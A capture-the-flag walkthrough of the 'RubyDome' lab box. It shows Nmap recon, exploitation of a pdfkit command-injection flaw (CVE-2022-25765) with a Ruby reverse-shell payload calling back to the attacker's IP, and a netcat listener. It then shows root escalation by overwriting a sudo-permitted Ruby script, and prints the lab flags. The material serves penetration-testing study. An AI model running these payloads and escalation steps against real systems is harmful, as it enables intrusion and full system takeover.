RubyDome

Intro

asdf

Initial Foothold

Nmap Scan Output

# Nmap 7.94SVN scan initiated Fri Mar 22 10:30:28 2024 as: nmap -sC -sV -vv -oA nmap/initial rubydome.pg
Nmap scan report for rubydome.pg (192.168.202.22)
Host is up, received reset ttl 61 (0.043s latency).
Scanned at 2024-03-22 10:30:29 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBYESg2KmNLhFh1KJaN2UFCVAEv6MWr58pqp2fIpCSBEK2wDJ5ap2XVBVGLk9Po4eKBbqTo96yttfVUvXWXoN3M=
|   256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBdIs4PWZ8yY2OQ6Jlk84Ihd5+15Nb3l0qvpf1ls3wfa
3000/tcp open  http    syn-ack ttl 61 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 10:30:38 2024 -- 1 IP address (1 host up) scanned in 9.83 seconds

RubyDome webpage converts URL to PDF

RubyDome uses package PDFKit.rb in the backend, which has available exploit

┌──(joe㉿kali)-[~]
└─$ searchsploit pdfkit --disable-colour
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
pdfkit v0.8.7.2 - Command Injection                                                                             | ruby/local/51293.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit granted initial access via reverse shell for user 'andrew'

┌──(joe㉿kali)-[~/hax/pg/rubydome]
└─$ python3 51293.py -s 192.168.45.152 80 -w http://rubydome.pg:3000/pdf -p url

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.152","80"))'`
LOCALIP: 192.168.45.152:80
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 80".
WEBSITE: http://rubydome.pg:3000/pdf
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.

Reverse shell listener

┌──(joe㉿kali)-[~]
└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.152] from (UNKNOWN) [192.168.202.22] 45852
whoami
andrew
which python3 
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
andrew@rubydome:~/app$ cd ..
cd ..
andrew@rubydome:~$ ls -la
ls -la
total 32
drwxr-x--- 3 andrew andrew 4096 Jun 13  2023 .
drwxr-xr-x 3 root   root   4096 Apr 25  2023 ..
drwxr-xr-x 2 andrew andrew 4096 Apr 25  2023 app
lrwxrwxrwx 1 root   root      9 Apr 25  2023 .bash_history -> /dev/null
-rw-r--r-- 1 andrew andrew  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 andrew andrew 3771 Jan  6  2022 .bashrc
-rw-rw-r-- 1 andrew andrew   33 Mar 22 15:26 local.txt
-rw-r--r-- 1 andrew andrew  807 Jan  6  2022 .profile
-rw-r--r-- 1 andrew andrew    0 Apr 25  2023 .sudo_as_admin_successful
-rw------- 1 andrew andrew  774 Jun 13  2023 .viminfo
andrew@rubydome:~$ cat local.txt
cat local.txt
c2c845c2342a613d302ea0d415882241

Privilege Escalation

adf

andrew@rubydome:~/app$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
andrew@rubydome:~/app$ ls -la
ls -la
total 148
drwxr-xr-x 2 andrew andrew   4096 Mar 22 16:17 .
drwxr-x--- 5 andrew andrew   4096 Mar 22 16:16 ..
-rwxrwx--- 1 andrew andrew   1032 Apr 24  2023 app.rb
-rw-rw-r-- 1 andrew andrew 131089 Mar 22 16:17 linpeas-output.txt
-rw-rw-r-- 1 andrew andrew   1220 Mar 22 15:46 page.pdf
andrew@rubydome:~/app$ cp app.rb app.rb.bak
cp app.rb app.rb.bak
andrew@rubydome:~/app$ echo "system('/bin/bash')" > app.rb
echo "system('/bin/bash')" > app.rb
andrew@rubydome:~/app$ sudo /usr/bin/ruby /home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb
root@rubydome:/home/andrew/app# whoami
whoami
root
root@rubydome:/home/andrew/app# cat /root/proof.txt
cat /root/proof.txt
2f232fecea3a2b5116cb328b9471bdd3

Last updated